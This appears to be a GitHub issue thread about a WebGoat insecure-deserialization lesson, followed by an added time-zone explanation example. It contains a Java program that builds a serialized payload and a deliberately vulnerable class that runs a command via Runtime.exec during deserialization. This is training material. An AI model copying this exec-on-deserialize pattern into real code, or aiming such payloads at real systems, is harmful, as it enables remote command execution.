The task is not executable between now and the next ten minutes, so the action will be ignored. Maybe you copied an old solution? Let's try again. #1637

Closed
chimcanhcutbietnoi opened this issue Oct 26, 2023 · 2 comments

@chimcanhcutbietnoi
I'm running WebGoat on my virtual machine and have already synchronized the time of the virtual server with the time of my host machine. But I keep receiving the message saying "The task is not executable between now and the next ten minutes, so the action will be ignored. Maybe you copied an old solution? Let's try again."
This is my Main.java:

```java
import java.io.*;
import java.util.*;
import java.time.*;
import org.dummy.insecure.framework.VulnerableTaskHolder;

public class Main{
	public static void main(String[] args) throws FileNotFoundException,IOException,ClassNotFoundException{
		VulnerableTaskHolder go = new VulnerableTaskHolder("penguin", "sleep 5");

		ByteArrayOutputStream bos = new ByteArrayOutputStream();
		ObjectOutputStream oos = new ObjectOutputStream(bos);
		oos.writeObject(go);
		oos.flush();
		System.out.println(Base64.getEncoder().encodeToString(bos.toByteArray()));
	}
}
```

This is VulnerableTaskHolder.java:

```java
package org.dummy.insecure.framework;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.time.LocalDateTime;
import java.time.Instant;
//import lombok.extern.slf4j.Slf4j;

//@Slf4j
// TODO move back to lesson
public class VulnerableTaskHolder implements Serializable {

  private static final long serialVersionUID = 2;

  private String taskName;
  private String taskAction;
  private LocalDateTime requestedExecutionTime;

  public VulnerableTaskHolder(String taskName, String taskAction) {
    super();
    this.taskName = taskName;
    this.taskAction = taskAction;
    this.requestedExecutionTime = LocalDateTime.now().plusSeconds(2);
  }

  @Override
  public String toString() {
    return "VulnerableTaskHolder [taskName="
        + taskName
        + ", taskAction="
        + taskAction
        + ", requestedExecutionTime="
        + requestedExecutionTime
        + "]";
  }

  /**
   * Execute a task when de-serializing a saved or received object.
   *
   * @author stupid develop
   */
  private void readObject(ObjectInputStream stream) throws Exception {
    // unserialize data so taskName and taskAction are available
    stream.defaultReadObject();

    // do something with the data
    //log.info("restoring task: {}", taskName);
    //log.info("restoring time: {}", requestedExecutionTime);

    if (requestedExecutionTime != null
        && (requestedExecutionTime.isBefore(LocalDateTime.now())
            || requestedExecutionTime.isAfter(LocalDateTime.now()))) {
      // do nothing is the time is not within 10 minutes after the object has been created
      //log.debug(this.toString());
      throw new IllegalArgumentException("outdated");
    }

    // condition is here to prevent you from destroying the goat altogether
    if ((taskAction.startsWith("sleep") || taskAction.startsWith("ping"))
        && taskAction.length() < 22) {
      //log.info("about to execute: {}", taskAction);
      try {
        Process p = Runtime.getRuntime().exec(taskAction);
        BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line = null;
        while ((line = in.readLine()) != null) {
          //log.info(line);
        }
      } catch (IOException e) {
        //log.error("IO Exception", e);
      }
    }
  }
}
```

@github-actions
Thanks for submitting your first issue, we will have a look as quickly as possible.

@zubcevic
Collaborator

zubcevic commented Nov 1, 2023

Is WebGoat running as a Java application on the same host, or is it running remotely or in some container context?
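
Why the host-versus-container question above matters, as an added example that is not part of the thread or of WebGoat's code: `LocalDateTime` carries no zone, so a timestamp built on one machine can look hours off to a checker in another zone even when both clocks are synchronized. The `accepted` helper is an assumed form of a ten-minute window check, and the instant and zones are constructed sample values.

```java
import java.time.Instant;
import java.time.LocalDateTime;
import java.time.ZoneId;

public class WindowCheckDemo {

  // Assumed ten-minute window (hypothetical helper, not WebGoat's code):
  // accept only timestamps in [checkerNow - 10 min, checkerNow].
  static boolean accepted(LocalDateTime requested, LocalDateTime checkerNow) {
    return !requested.isBefore(checkerNow.minusMinutes(10))
        && !requested.isAfter(checkerNow);
  }

  // Wall-clock reading of one physical instant in a given zone.
  static LocalDateTime wallClock(Instant instant, ZoneId zone) {
    return LocalDateTime.ofInstant(instant, zone);
  }

  public static void main(String[] args) {
    // Constructed sample values: one physical instant shared by both machines,
    // so their clocks are perfectly synchronized; only the zones differ.
    Instant created = Instant.parse("2023-10-26T08:00:00Z");
    ZoneId creatorZone = ZoneId.of("Europe/Amsterdam"); // machine that serializes
    ZoneId checkerZone = ZoneId.of("UTC");              // machine that deserializes

    // Same expression shape as the posted constructor: now() plus two seconds.
    // Only the wall-clock fields are stored; the zone is not part of the object.
    LocalDateTime requested = wallClock(created, creatorZone).plusSeconds(2);
    System.out.println("requestedExecutionTime = " + requested);

    // Checked five seconds later on a machine in the same zone.
    System.out.println("same zone, +5s:  "
        + accepted(requested, wallClock(created.plusSeconds(5), creatorZone)));

    // Checked five seconds later on a machine whose default zone is UTC:
    // the stored wall-clock value now appears to lie in the future.
    System.out.println("other zone, +5s: "
        + accepted(requested, wallClock(created.plusSeconds(5), checkerZone)));

    // Checked one second later in the same zone: the two-second offset alone
    // still places the value ahead of the checker's clock.
    System.out.println("same zone, +1s:  "
        + accepted(requested, wallClock(created.plusSeconds(1), creatorZone)));
  }
}
```

Comparing `requestedExecutionTime` from the decoded payload against the output of `date` on the machine or container that runs WebGoat shows whether either effect applies.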
